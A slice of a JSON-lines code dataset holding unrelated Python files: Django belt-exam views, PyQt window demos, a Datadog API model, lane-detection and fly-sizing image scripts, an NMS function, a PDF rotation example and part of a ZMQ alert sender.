sinav.coachs.add(x)\n sinav.save()\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n return render(request, 'kulup/kusak-sınavı-antroner-sec.html', {'athletes': athletes})\n\n\n@login_required\ndef add_belt_exam(request):\n perm = general_methods.control_access(request),\n if not perm:\n 
logout(request)\n return redirect('accounts:login')\n exam_form = BeltExamForm(request.POST, request.FILES or None)\n user = request.user\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n # print(club.dataAccessControl)\n clubsPk.append(club.pk)\n exam_form.fields['sportClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exam_form.fields['sportClub'].queryset = SportsClub.objects.all()\n\n if request.method == 'POST':\n exam_form = BeltExamForm(request.POST, request.FILES or None)\n if exam_form.is_valid():\n exam = exam_form.save()\n messages.success(request, 'Sınav başarıyla oluşturuldu')\n return redirect('sbs:kusak-sinavlari')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n return render(request, 'kulup/kusak-sinavi-ekle.html', {'exam_form': exam_form})\n\n\n@login_required\ndef update_belt_exam(request, pk):\n # print('kusak sinavi düzenle çalisti')\n perm = general_methods.control_access(request)\n if not perm:\n logout(request)\n return redirect('accounts:login')\n sinav = BeltExam.objects.get(pk=pk)\n # license_form = LicenseForm(request.POST or None, request.FILES or None, instance=license,initial={'sportsClub': license.sportsClub})\n # print(sinav.sportClub)\n exam_form = BeltExamForm(request.POST or None, request.FILES or None, instance=sinav,\n initial={'sportsClub': sinav.sportClub.name})\n # print(exam_form)\n user = request.user\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n exam_form.fields['sportClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exam_form.fields['sportClub'].queryset = 
SportsClub.objects.all()\n\n if request.method == 'POST':\n exam_form = BeltExamForm(request.POST, request.FILES or None)\n if exam_form.is_valid():\n exam = exam_form.save()\n messages.success(request, 'Sınav başarıyla güncellendi')\n return redirect('sbs:kusak-sinavlari')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kusak-sinavi-güncelle.html', {'exam_form': exam_form})\n\n\n@login_required\ndef delete_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportsClub.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except SportsClub.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef updateClubPersonsProfile(request):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user = request.user\n club_user = SportClubUser.objects.get(user=user)\n person = Person.objects.get(pk=club_user.person.pk)\n communication = Communication.objects.get(pk=club_user.communication.pk)\n user_form = DisabledUserForm(request.POST or None, instance=user)\n person_form = DisabledPersonForm(request.POST or None, request.FILES or None, instance=person)\n communication_form = DisabledCommunicationForm(request.POST or None, instance=communication)\n club_form = DisabledSportClubUserForm(request.POST or None, instance=club_user)\n password_form = SetPasswordForm(request.user, request.POST)\n\n if request.method == 'POST':\n data = request.POST.copy()\n person_form = DisabledPersonForm(data)\n\n if len(request.FILES) > 0:\n person.profileImage = request.FILES['profileImage']\n person.save()\n 
messages.success(request, 'Profil Fotoğrafı Başarıyla Güncellenmiştir.')\n\n if password_form.is_valid():\n user.set_password(password_form.cleaned_data['new_password2'])\n user.save()\n update_session_auth_hash(request, user)\n messages.success(request, 'Şifre Başarıyla Güncellenmiştir.')\n return redirect('sbs:kulup-uyesi-profil-guncelle')\n\n return render(request, 'kulup/kulup-uyesi-profil-guncelle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'password_form': password_form, 'club_form': club_form})\n\n\n@login_required\ndef Exam_list_antroner_delete(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportsClub.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except SportsClub.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n\n# listeden antroner sil\n\n@login_required\ndef choose_coach_remove(request, pk, exam_pk):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n sinav = BeltExam.objects.get(pk=exam_pk)\n sinav.coachs.remove(Coach.objects.get(pk=pk))\n\n return redirect('sbs:kusak-sinavi-incele', pk=exam_pk)\n\n\n@login_required\ndef choose_athlete_remove(request, pk, exam_pk):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n sinav = BeltExam.objects.get(pk=exam_pk)\n sinav.athletes.remove(Athlete.objects.get(pk=pk))\n\n return redirect('sbs:kusak-sinavi-incele', pk=exam_pk)\n","sub_path":"sbs/Views/ClubViews.py","file_name":"ClubViews.py","file_ext":"py","file_size_in_byte":48673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"568065191","text":"# -*- coding: utf-8 -*-\n\nimport sys\nfrom Qt import QtCore\nfrom Qt import QtGui\nfrom Qt import QtWidgets\n# QtCore.QTextCodec.setCodecForTr(QTextCodec.codecForName(\"utf8\"))\n\n\nclass SplitterWidget(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(SplitterWidget, self).__init__(parent)\n\n mainSplitter = QtWidgets.QSplitter(QtCore.Qt.Horizontal, self)\n\n leftText = QtWidgets.QTextEdit((u\"左窗口
sldjflksjdklf\"), mainSplitter)\n leftText.setAlignment(QtCore.Qt.AlignCenter)\n\n rightSplitter = QtWidgets.QSplitter(QtCore.Qt.Vertical, mainSplitter)\n rightSplitter.setOpaqueResize(False)\n\n upText = QtWidgets.QTextEdit((u\"上窗口\"), rightSplitter)\n upText.setAlignment(QtCore.Qt.AlignCenter)\n\n bottomText = QtWidgets.QTextEdit((u\"下窗口\"), rightSplitter)\n bottomText.setAlignment(QtCore.Qt.AlignCenter)\n\n mainSplitter.setStretchFactor(1, 20)\n rightSplitter.setStretchFactor(2, 1)\n # mainSplitter.setWindowTitle((\"分割窗口\"))\n\n self.setCentralWidget(mainSplitter)\n\n\nclass MainWidget(QtWidgets.QMainWindow):\n def __init__(self,parent=None):\n super(MainWidget,self).__init__(parent)\n self.setWindowTitle((u\"依靠窗口\"))\n\n widget = SplitterWidget()\n\n self.setCentralWidget(widget)\n\n #停靠窗口 1\n dock1=QtWidgets.QDockWidget((u\"停靠窗口 1\"),self)\n dock1.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable)\n dock1.setAllowedAreas(QtCore.Qt.LeftDockWidgetArea|QtCore.Qt.RightDockWidgetArea)\n te1=QtWidgets.QTextEdit((u\"窗口 1,可在 Main Window 的左部和右部停靠,不可浮动,不可关闭\"))\n dock1.setWidget(te1)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea,dock1)\n\n #停靠窗口 2\n dock2=QtWidgets.QDockWidget((u\"停靠窗口 2\"),self)\n dock2.setFeatures(QtWidgets.QDockWidget.DockWidgetFloatable|QtWidgets.QDockWidget.DockWidgetClosable)\n # dock2.setTitleBarWidget()\n te2=QtWidgets.QTextEdit((u\"窗口 2,只可浮动\"))\n dock2.setWidget(te2)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea,dock2)\n\n #停靠窗口 2\n dock4=QtWidgets.QDockWidget((u\"停靠窗口 4\"),self)\n dock4.setFeatures(QtWidgets.QDockWidget.DockWidgetFloatable|QtWidgets.QDockWidget.DockWidgetClosable)\n te4=QtWidgets.QTextEdit((u\"窗口 4,只可浮动\"))\n dock4.setWidget(te4)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea,dock4)\n\n #停靠窗口 3\n dock3=QtWidgets.QDockWidget((u\"停靠窗口 3\"),self)\n dock3.setFeatures(QtWidgets.QDockWidget.AllDockWidgetFeatures)\n te3=QtWidgets.QTextEdit((u\"窗口 3,可在 Main Window 任意位置停靠,可浮动,可关闭\"))\n dock3.setWidget(te3)\n 
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,dock3)\n\n #dock1 和dock4 合并\n self.tabifyDockWidget(dock1, dock4)\n\n\nif __name__ == \"__main__\":\n app=QApplication(sys.argv)\n main=MainWidget()\n main.show()\n app.exec_()","sub_path":"dog/untitled1/test_1/pyqtlayout26_03_v01.py","file_name":"pyqtlayout26_03_v01.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352067254","text":"from PyQt4.QtCore import *\r\nfrom PyQt4.QtGui import *\r\n\r\nfrom DatabaseForGUI import *\r\n\r\nclass OtherGUI(QMainWindow):\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n \r\n self._parent = parent\r\n self.setWindowTitle(\"This is my other window\")\r\n\r\n # Create label and line edit\r\n self._name_label = QLabel(\"List of teachers\")\r\n self._teacher_list = QComboBox()\r\n \r\n self._tableview = QTableView()\r\n \r\n self.PopulateTeacherComboBox()\r\n self.PopulateTableView()\r\n\r\n # Create button\r\n self._close_button = QPushButton(\"Close\")\r\n\r\n # Create a vertical box layout to put the label, line edit and button into\r\n self._layout = QVBoxLayout()\r\n\r\n # Add the widgets to the vertical box layout\r\n self._layout.addWidget(self._name_label)\r\n self._layout.addWidget(self._teacher_list)\r\n self._layout.addWidget(self._tableview)\r\n self._layout.addWidget(self._close_button)\r\n\r\n # We then need to set the layout for the QMainWindow. However, we can't\r\n # use the setLayout method as it doesn't work properly. 
Therefore, put\r\n # the layout inside a widget and call setCentralWidget on the QMainWindow.\r\n self._widget = QWidget()\r\n self._widget.setLayout(self._layout)\r\n\r\n self.setCentralWidget(self._widget)\r\n\r\n # Connect up the button to some method, in this case 'add_name'\r\n self._close_button.clicked.connect(self.onCloseClicked)\r\n \r\n def onCloseClicked(self):\r\n # Close the window\r\n #self._parent.setHidden(False)\r\n self.close()\r\n\r\n def PopulateTeacherComboBox(self):\r\n teachers = g_database.GetAllTeachers()\r\n for teacher in teachers:\r\n self._teacher_list.addItem(teacher[1])\r\n \r\n def PopulateTableView(self):\r\n teachers = g_database.GetAllTeachers()\r\n model = QStandardItemModel()\r\n row = 0\r\n for teacher in teachers:\r\n for column in range(2):\r\n item = QStandardItem(\"{}\".format(teacher[column]))\r\n model.setItem(row, column, item)\r\n row+=1\r\n \r\n self._tableview.setModel(model)","sub_path":"Implementation/OtherGUI.py","file_name":"OtherGUI.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"529218521","text":"# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.\n# This product includes software developed at Datadog (https://www.datadoghq.com/).\n# Copyright 2019-Present Datadog, Inc.\nfrom __future__ import annotations\n\nfrom typing import Union, TYPE_CHECKING\n\nfrom datadog_api_client.model_utils import (\n ModelNormal,\n cached_property,\n unset,\n UnsetType,\n)\n\n\nif TYPE_CHECKING:\n from datadog_api_client.v2.model.rum_aggregation_function import RUMAggregationFunction\n from datadog_api_client.v2.model.rum_compute_type import RUMComputeType\n\n\nclass RUMCompute(ModelNormal):\n @cached_property\n def openapi_types(_):\n from datadog_api_client.v2.model.rum_aggregation_function import RUMAggregationFunction\n from datadog_api_client.v2.model.rum_compute_type 
import RUMComputeType\n\n return {\n \"aggregation\": (RUMAggregationFunction,),\n \"interval\": (str,),\n \"metric\": (str,),\n \"type\": (RUMComputeType,),\n }\n\n attribute_map = {\n \"aggregation\": \"aggregation\",\n \"interval\": \"interval\",\n \"metric\": \"metric\",\n \"type\": \"type\",\n }\n\n def __init__(\n self_,\n aggregation: RUMAggregationFunction,\n interval: Union[str, UnsetType] = unset,\n metric: Union[str, UnsetType] = unset,\n type: Union[RUMComputeType, UnsetType] = unset,\n **kwargs,\n ):\n \"\"\"\n A compute rule to compute metrics or timeseries.\n\n :param aggregation: An aggregation function.\n :type aggregation: RUMAggregationFunction\n\n :param interval: The time buckets' size (only used for type=timeseries)\n Defaults to a resolution of 150 points.\n :type interval: str, optional\n\n :param metric: The metric to use.\n :type metric: str, optional\n\n :param type: The type of compute.\n :type type: RUMComputeType, optional\n \"\"\"\n if interval is not unset:\n kwargs[\"interval\"] = interval\n if metric is not unset:\n kwargs[\"metric\"] = metric\n if type is not unset:\n kwargs[\"type\"] = type\n super().__init__(kwargs)\n\n self_.aggregation = aggregation\n","sub_path":"src/datadog_api_client/v2/model/rum_compute.py","file_name":"rum_compute.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"166063107","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 19 09:32:07 2017\n\n@author: roy\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 11 19:35:19 2017\n\n@author: roy\n\"\"\"\nfrom PIL import Image\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n#src = np.asarray([[527, 500], [763, 500], [910, 600], [392, 600]], dtype=np.float32)\nsrc = np.asarray([[524, 500], [768, 500], [910, 600], [392, 600]], dtype=np.float32)\n#dst = np.asarray([[392, 300], 
[910, 300], [910, 600], [390, 600]], dtype=np.float32)\ndst = np.asarray([[196, 300], [455, 300], [455, 600], [196, 600]], dtype=np.float32)\n\nimage = np.asarray(Image.open('./test_images/straight_undist2.jpg').convert('L'))\n\n\nmt_persp=cv2.getPerspectiveTransform(src, dst)\n\nimg_size = (image.shape[1]//2, image.shape[0])\n\nimg_warped = cv2.warpPerspective(image, mt_persp, img_size)\n\nplt.figure(figsize=(12,9))\nplt.gray()\nplt.imshow(img_warped)\n\ndef lane_search(image):\n nwindows = 10\n margin = 100\n minpix = 50\n \n img_h, img_w = image.shape\n window_height = img_h//nwindows\n \n hstg = np.sum(image[img_h//2:, :], axis=0)\n img_out = np.dstack((image, image, image))*255\n \n midpoint = img_w//2\n leftx_base = np.argmax(hstg[:midpoint])\n rightx_base = np.argmax(hstg[midpoint:]) + midpoint\n \n nonzero = image.nonzero()\n nonzeroy = nonzero[0]\n nonzerox = nonzero[1]\n \n leftx_current = leftx_base\n rightx_current = rightx_base\n \n left_lane_inds = []\n right_lane_inds = []\n\n for window in range(nwindows):\n win_y_low = img_h - (window + 1)*window_height\n win_y_high = img_h - window * window_height\n \n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n \n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n \n #cv2.rectangle(img_out, (win_xleft_low, win_y_low), \n # (win_xleft_high, win_y_high), (0, 255, 0), 2)\n #cv2.rectangle(img_out, (win_xright_low, win_y_low), \n # (win_xright_high, win_y_high), (0, 255, 0), 2)\n \n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & \n (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n \n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n \n if len(good_left_inds) > minpix:\n leftx_current = 
np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n \n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n left_fit = np.polyfit(lefty, leftx, 2)\n print(left_fit)\n \n radius_l = cal_radius(leftx, lefty)\n print(radius_l)\n\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n right_fit = np.polyfit(righty, rightx, 2)\n print(right_fit)\n \n radius_r = cal_radius(rightx, righty)\n print(radius_r)\n \n # find indice for the whole image\n whole_img = np.indices((img_h, img_w))\n imgx= whole_img[1].flatten()\n imgy = whole_img[0].flatten()\n \n #print('imgx shape {}, imgy shape {}'.format(imgx.shape, imgy.shape))\n # got indice between left lane and right lane\n lane_inds = ((imgx >= (left_fit[0]*(imgy**2) + left_fit[1] * imgy + left_fit[2])) \n & (imgx < (right_fit[0]*(imgy**2) + right_fit[1] * imgy + right_fit[2])))\n # paint the lane to green\n img_out[imgy[lane_inds], imgx[lane_inds]] = [0, 255, 0]\n \n #paint left track to Red, right track to green\n img_out[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n img_out[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n \n\n return img_out\n\ndef cal_radius(x, y):\n mppx = 3.7/270\n #mppx = 3.7/540\n mppy = 3.0/100\n fit_rw = np.polyfit(y * mppy, x * mppx, 2)\n py_rw = 350 * mppy\n radius = (1.0 + (2*fit_rw[0]*py_rw+fit_rw[1])**2)**1.5/(2.0*fit_rw[0])\n return radius\n \ndef sobel_filter(image_gray, orient='x', kern_size = 3, thresh=(0, 255)):\n # Calculate directional gradient\n # Apply threshold\n if orient == 'x':\n sobel_img = cv2.Sobel(image_gray, cv2.CV_64F, 1, 0, ksize=kern_size)\n elif orient == 'y':\n sobel_img = cv2.Sobel(image_gray, cv2.CV_64F, 0, 1, ksize=kern_size)\n \n sobel_img[ sobel_img < 0 ] =0\n #sobel_img = np.abs(sobel_img)\n 
scaled_sobel = np.uint8(255 * sobel_img/np.max(sobel_img))\n grad_binary = np.zeros_like(image_gray)\n grad_binary[( scaled_sobel >= thresh[0] ) & (scaled_sobel <= thresh[1])] = 1\n return grad_binary\n\nimg3 = sobel_filter(img_warped, orient='x', kern_size=5, thresh=(100, 255))\nplt.figure(figsize=(12,9))\nplt.gray()\nplt.imshow(img3)\n\nimg4 = lane_search(img3)\n\nplt.figure(figsize=(12,9))\nplt.gray()\nplt.imshow(img4)\n","sub_path":"test_curvature.py","file_name":"test_curvature.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296079053","text":"# By submitting this assignment, I agree to the following:\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do\"\n# \"I have not given or received any unauthorized aid on this assignment\"\n#\n# Name: Chase Johnson, Anna Olmedo, Bryan Jones, Gustavo Rodriguez\n# Section: 413\n# Assignment: Lab 02_Act3_Bonus\n# Date: 5 September, 2019\n\nfrom math import *\n\n# Set values\nxi = 30 # Starting time\ny = 50 # Distance Traveled\nspeed = 565/15\ntrackLength = 2*pi*0.5\n\nchoice = input(\"Are you giving me (m)inutes or (s)econds [s]? \")\nms = \"s\"\nif \"m\" in choice:\n ms = \"m\"\n\ntimeToRace = float(input(\"How long do you want the car to drive? \"))\nif ms == \"m\":\n timeToRace = timeToRace*60\n\ny += (timeToRace-xi)*(speed) # Current position\nprint(\"Distance at time: \" + str(int(timeToRace)) + \" = \" + str(y) + \" meters\")\n","sub_path":"Group_Labs/Lab02/Act3_Bonus.py","file_name":"Act3_Bonus.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"73254542","text":"#! 
-*- coding:utf-8 -*-\n\n'''\n@Author: ZM\n@Date and Time: 2021/5/4 10:39\n@File: nms.py\n'''\n\nimport numpy as np\n\ndef nms(bboxes, scores, iou_threshold=0.5, max_num_boxes=20):\n y1 = bboxes[:, 0]\n x1 = bboxes[:, 1]\n y2 = bboxes[:, 2]\n x2 = bboxes[:, 3]\n\n areas = (y2 - y1) * (x2 - x1)\n order = np.argsort(scores)[::-1]\n nms_index = []\n\n while np.size(order) > 0:\n i = order[0]\n nms_index.append(i)\n\n y_min = np.maximum(y1[i], y1[order[1:]])\n x_min = np.maximum(x1[i], x1[order[1:]])\n y_max = np.minimum(y2[i], y2[order[1:]])\n x_max = np.minimum(x2[i], x2[order[1:]])\n inter = np.maximum(0, y_max - y_min) * np.maximum(0, x_max - x_min)\n iou = inter / (areas[i] + areas[order[1:]] - inter)\n idx = np.nonzero(iou <= iou_threshold)[0]\n order = order[idx + 1]\n\n return nms_index[:max_num_boxes]\n","sub_path":"yolov3/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151600230","text":"import numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport os\nimport warnings\nimport csv\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dir\", required=True, help=\"Path to the image\")\nargs = vars(ap.parse_args())\n#args = [\"/Users/Wolf/Desktop/Area_Weight_correlation/tiff_images\"]\n\ncount = 0\nrows = []\n\ndef calculateHoughCircles(fileName):\n # load the image, clone it for output\n image = cv2.imread(fileName)\n if (image.shape[0] > image.shape[1]):\n image = imutils.rotate_bound(image, 270)\n output = image.copy()\n global rows\n global count\n height, width, depth = image.shape\n\n # Grayscale\n imgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # Median\n #*** Blurring can require modification for the script to work ***\n blur = cv2.medianBlur(imgray, 23)\n # Thresh\n ret1, thresh1 = cv2.threshold(blur, 0, 255, cv2.THRESH_TOZERO + cv2.THRESH_OTSU)\n \n 
#*** (ret1 - 12) is the threshold as a factor of the one determined by cv2.THRESH_TOZERO + cv2.THRESH_OTSU above. Its modification can fix the script. ***\n ret2, thresh = cv2.threshold(blur, (ret1 - 12), 255, cv2.THRESH_TOZERO)\n edged = cv2.Canny(thresh, 0, 255)\n\n # Crop image\n cropped = np.zeros((height, width), np.uint8)\n # NOTE: This cropping can be very problematic. It can cut too much or not enough depending on the image. Make sure to adjust this when implementing the algorithm.\n cropped[250:(height - 250), 450:(width - 450)] = -1\n\n masked = cv2.bitwise_and(edged, edged, mask=cropped)\n\n #In the line below, the parameters are very relevant for the alg. Radius, sensitivity, minDist, etc. can affect the algorithm. Change them before looking further.\n circles = cv2.HoughCircles(masked, cv2.HOUGH_GRADIENT, 5, 320, minRadius=120, maxRadius=160)\n\n # detect circles in the image\n # https://docs.opencv.org/3.1.0/da/d53/tutorial_py_houghcircles.html\n # VERY parameter specific. This requires tweaking at the photo level and is non generalizable.\n # Standardized pictures should fix this problem. We have a ~95% success rate\n\n # First check for 96 wells\n warn = False\n kill = False\n #print(circles.shape)\n if circles.shape[1] > 96:\n warnings.warn(\"96 wells were not detected! Skipping image\")\n print(\"Filename: \", os.path.basename(fileName))\n print(\"Greater than 96 wells were detected. Skipping image.\")\n kill = True\n \n if circles.shape[1] < 96:\n warnings.warn(\"96 wells were not detected! Skipping image.\")\n print(\"Filename: \", os.path.basename(fileName))\n print(\"Less than than 96 wells were detected. 
Skipping image.\")\n kill = True\n\n if circles is not None and kill == False:\n count = count + 1\n # convert the (x, y) coordinates and radius of the circles to integers\n circles = np.round(circles[0, :]).astype(\"int\")\n circ = circles.tolist()\n circ.sort(key=lambda x: x[1])\n # Hardcode list structure - rows on horizontals\n Lists = [[] for _ in range(8)]\n Lists[0] = circ[0:12]\n Lists[1] = circ[12:24]\n Lists[2] = circ[24:36]\n Lists[3] = circ[36:48]\n Lists[4] = circ[48:60]\n Lists[5] = circ[60:72]\n Lists[6] = circ[72:84]\n Lists[7] = circ[84:96]\n\n for l in Lists:\n if (len(l) != 12):\n warnings.warn(\"Wrong count of wells in a row\")\n l.sort(key=lambda x: x[0])\n for i in range(8):\n for n in range(12):\n (x, y, r) = Lists[i][n]\n xo = np.round(x).astype(\"int\")\n yo = np.round(y).astype(\"int\")\n ro = np.round(r).astype(\"int\")\n\n crop = output[(y - r):(y + r), (x - r):(x + r)]\n crop_gray = cv2.cvtColor(crop, cv2.COLOR_BGR2GRAY)\n ret, threshCrop1 = cv2.threshold(crop_gray, 0, 255, cv2.THRESH_TOZERO + cv2.THRESH_OTSU)\n \n #*** (ret1 - 15) is the threshold as a factor of the one determined by cv2.THRESH_TOZERO + cv2.THRESH_OTSU above. Its modification can fix the script. ***\n ret, threshCrop = cv2.threshold(crop_gray, (ret - 15), 255, cv2.THRESH_TOZERO)\n ret2, tc2 = cv2.threshold(threshCrop, 1, 255, cv2.THRESH_BINARY_INV)\n\n height, width = 2 * r, 2 * r\n mask = np.zeros((height, width), np.uint8)\n \n #Cut circle with radius = 25 from section of image. This keeps edges of well from interferring with flies. 
\n cv2.circle(mask, (r, r), (r - 25), (255, 255, 255), thickness=-1)\n masked_data = cv2.bitwise_and(tc2, tc2, mask=mask)\n \n image, contours, hierarchy = cv2.findContours(masked_data, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contour_list = []\n area = 0\n for contour in contours:\n approx = cv2.approxPolyDP(contour, 0.01 * cv2.arcLength(contour, True), True)\n tempArea = cv2.contourArea(contour)\n (x, y), radius = cv2.minEnclosingCircle(contour)\n #Ad hoc morphology check\n if (len(approx) > 5) & (tempArea < 5000) & (tempArea > 1000) & (3.1415 * (radius ** 2) / 7 < tempArea):\n contour_list.append(contour)\n area = tempArea\n cv2.drawContours(masked_data, contour_list, -1, (50, 50, 50), 3)\n cv2.circle(output, (xo, yo), ro, (0, 255, 0), 4)\n rows.append({'NumericalLocation(Row)': str(i + 1), 'NumericalLocation(Col)': str(n + 1), 'Area': area,'FileName': os.path.basename(fileName)})\n if warn:\n cv2.imshow(\"output\", output)\n cv2.waitKey(0)\n\n\n\n\ntotal = 0\nfor file in os.listdir(args[0]):\n if file.endswith(\".tiff\"):\n total = total + 1\n print(os.path.join(args[0], file))\n calculateHoughCircles(os.path.join(args[0], file))\n\nwith open('Output.csv', 'w') as csvfile:\n fieldnames = ['NumericalLocation(Row)', 'NumericalLocation(Col)', 'Area', \"FileName\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(rows)\n \nprint(\"Used \", count, \" out of \", total, \" images.\")\n\nif count/total < 0.75:\n warnings.warn(\"Less than 75% of images used.\")\nif count < 10:\n warnings.warn(\"Used less than 10 images for size estimates.\")\n","sub_path":"AssortedScripts/FlySizer.py","file_name":"FlySizer.py","file_ext":"py","file_size_in_byte":6534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"108034687","text":"# PDFs with Python - get number of pages, rotate pdf.\n# Input - dummy.pdf\n# Output - tilt.pdf\n\nimport PyPDF2\n\nwith open('dummy.pdf', 'rb') as 
file:\n # print(file)\n reader = PyPDF2.PdfFileReader(file)\n print(reader.numPages) # get number of pages\n page = reader.getPage(0)\n page.rotateCounterClockwise(90) # rotate pdf\n writer = PyPDF2.PdfFileWriter()\n writer.addPage(page)\n with open('tilt.pdf', 'wb') as new_file:\n writer.write(new_file)\n","sub_path":"pdf1.py","file_name":"pdf1.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333973630","text":"\"\"\"\nZMQ Sender, Alerts framework.\n\n\"\"\"\n\n\nimport os\nimport logging\n\nimport zmq\n\nfrom WMCore.Alerts.Alert import RegisterMsg, UnregisterMsg, ShutdownMsg\n\n\n\nclass Sender(object):\n \"\"\"\n ZMQ sender to dispatch alerts to a target.\n\n \"\"\"\n # this delay specifies how long to wait when there are un-delivered\n # messages in the ZMQ buffer when closing the socket (channel) / context.\n # some messages may be lost but solves the issue of hanging esp. in the\n # test when there is no receiver available (ticket #1837)\n LINGER_DELAY = 1000 # [ms]\n\n\n def __init__(self, target, controller, label = None):\n self._label = label or \"Sender_%s\" % os.getpid()\n self._context = zmq.Context()\n # set up a channel to send work\n self._workChannel = self._context.socket(zmq.PUSH)\n self._workChannel.setsockopt(zmq.LINGER, self.LINGER_DELAY)\n self._workChannel.connect(target)\n # set up a control channel\n self._contChannel = self._context.socket(zmq.PUB)\n self._contChannel.setsockopt(zmq.LINGER, self.LINGER_DELAY)\n self._contChannel.connect(controller)\n # socket closure will be done on garbage collection of Sender instance\n\n\n def __call__(self, alert):\n \"\"\"\n Send the alert instance to the target that this sender represents.\n\n \"\"\"\n self._workChannel.send_json(alert)\n logging.debug(\"Alert %s sent.\" % alert)\n\n\n def register(self):\n \"\"\"\n Send a register message to the target.\n\n \"\"\"\n 
